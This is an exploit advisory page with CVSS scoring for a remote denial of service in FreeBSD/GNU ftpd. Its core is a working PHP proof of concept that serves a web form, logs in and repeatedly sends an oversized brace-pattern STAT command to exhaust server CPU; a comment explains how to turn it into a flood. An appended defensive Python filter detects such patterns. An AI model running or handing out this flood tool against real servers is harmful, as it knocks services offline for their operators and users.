FreeBSD/GNU ftpd remote denial of service exploit

2013-01-31 / 2013-02-01
Credit: DevilTeam
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<?php
//PoC by Kacper R. from devilteam.pl
//Bug found by: Maksymilian ( cxsec.org )
set_time_limit(0);
if(isset($_GET['runit'])){
    flush();
    while(1){
        $fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5);
        fread($fp,1024);
        fwrite($fp, "USER ".$_GET['user']."\r\n");
        fread($fp,1024);
        fwrite($fp, "PASS ".$_GET['pass']."\r\n");
        fread($fp,1024);
        // chr(123).chr(97).chr(44).chr(98).chr(125) is the string "{a,b}"
        fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n");
        fclose($fp);
        time_nanosleep(0,300000000);//delete to flood
        flush();
    }
}
if(!isset($_GET['host'])) $_GET['host']='localhost';
if(!isset($_GET['port'])) $_GET['port']='21';
if(!isset($_GET['user'])) $_GET['user']='anonymous';
if(!isset($_GET['pass'])) $_GET['pass']='anonymous';
echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of Service</title></head><body>
<h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action="" method="GET">
<PRE>
Host: <input type="text" name="host" value="'.$_GET['host'].'">
Port: <input type="text" name="port" value="'.$_GET['port'].'">
User: <input type="text" name="user" value="'.$_GET['user'].'">
Pass: <input type="text" name="pass" value="'.$_GET['pass'].'">
</PRE>
</p>';
if(isset($_GET['confirm'])){
    echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop" name="runit">';
    echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt2.gif"></a><a href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png" width="100" height="40"></a>';
}
else{
    echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">';
    echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/" ><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100" height="40"></a>';
}
echo '
</form>
</body>
</html>';
?>
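
A defensive counterpart, added here and not part of the original advisory or the PoC authors' code: the STAT argument the PoC builds is `{a,b}` repeated 64 times, which a brace-expanding server would have to enumerate as 2^64 words. Assuming the CPU exhaustion comes from that expansion (the page does not state the root cause), an FTP proxy or log filter can compute the expansion count without expanding anything and reject oversized patterns. `MAX_EXPANSIONS`, `brace_expansion_count` and `flag_commands` are hypothetical names, and the check covers every command argument, which goes beyond the STAT case shown.

```python
# Added example: pre-filter for FTP command lines; not code from the advisory.
MAX_EXPANSIONS = 1024  # assumed site policy threshold (hypothetical value)

def brace_expansion_count(arg):
    """Estimate how many words brace expansion of `arg` yields, without
    expanding it: alternatives in a group add, adjacent groups multiply."""
    stack = [[0, 1]]  # per open group: [finished alternatives, current product]
    for ch in arg:
        if ch == "{":
            stack.append([0, 1])
        elif ch == "," and len(stack) > 1:
            stack[-1][0] += stack[-1][1]
            stack[-1][1] = 1
        elif ch == "}" and len(stack) > 1:
            done, current = stack.pop()
            stack[-1][1] *= done + current
        # any other character is a literal and leaves the count unchanged
    while len(stack) > 1:
        # Unclosed '{': counted as if closed at end of input. Implementations
        # differ on unbalanced braces, so this is an estimate, not an exact count.
        done, current = stack.pop()
        stack[-1][1] *= done + current
    return stack[0][1]

def flag_commands(lines, limit=MAX_EXPANSIONS):
    """Return (verb, count) for each command whose argument expands past `limit`."""
    flagged = []
    for line in lines:
        verb, _, arg = line.rstrip("\r\n").partition(" ")
        count = brace_expansion_count(arg)
        if count > limit:
            flagged.append((verb.upper(), count))
    return flagged

# Constructed sample command lines (not captured traffic).
SAMPLE = [
    "USER anonymous\r\n",
    "STAT /pub/{README,INSTALL}\r\n",
    "LIST {a,b}{c,d,e}\r\n",
    "STAT " + "{a,b}" * 64 + "\r\n",  # the argument shape the PoC sends
]

if __name__ == "__main__":
    for verb, count in flag_commands(SAMPLE):
        print(f"reject {verb}: argument would expand to {count} words")
```

The count is computed in time linear in the argument length using Python's arbitrary-precision integers, so the filter itself cannot be driven into the same exhaustion.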

References:

https://devilteam.pl
http://cxsecurity.com/issue/WLB-2013020003

